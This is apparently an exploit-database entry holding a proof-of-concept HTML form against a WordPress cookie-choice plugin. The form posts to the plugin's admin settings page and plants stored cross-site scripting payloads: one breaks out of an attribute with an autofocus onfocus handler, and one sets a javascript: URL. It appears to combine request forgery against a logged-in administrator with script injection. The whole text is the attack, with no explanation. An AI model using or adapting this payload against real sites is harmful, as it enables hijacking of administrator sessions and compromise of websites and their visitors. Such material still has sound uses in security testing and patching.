Share
## https://sploitus.com/exploit?id=WPEX-ID:C809BDB3-D820-4CE1-9CBC-E41985FB5052
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=wp-cookiechoise" method="POST">
<input type="text" name="send" value="send">
<input type="text" name="cookiechoice_close" value="">
<input type="text" name="cookiechoice_more" value='" autofocus=autofocus onfocus=alert(String.fromCharCode(111,112,115)) e="'>
<input type="text" name="cookiechoice_url" value="javascript:alert(String.fromCharCode(111,112,115))">
<input type="checkbox" name="cookiechoice_active" value="1" checked="checked">
<input type="submit" value="submit">
</form>
</body>
</html>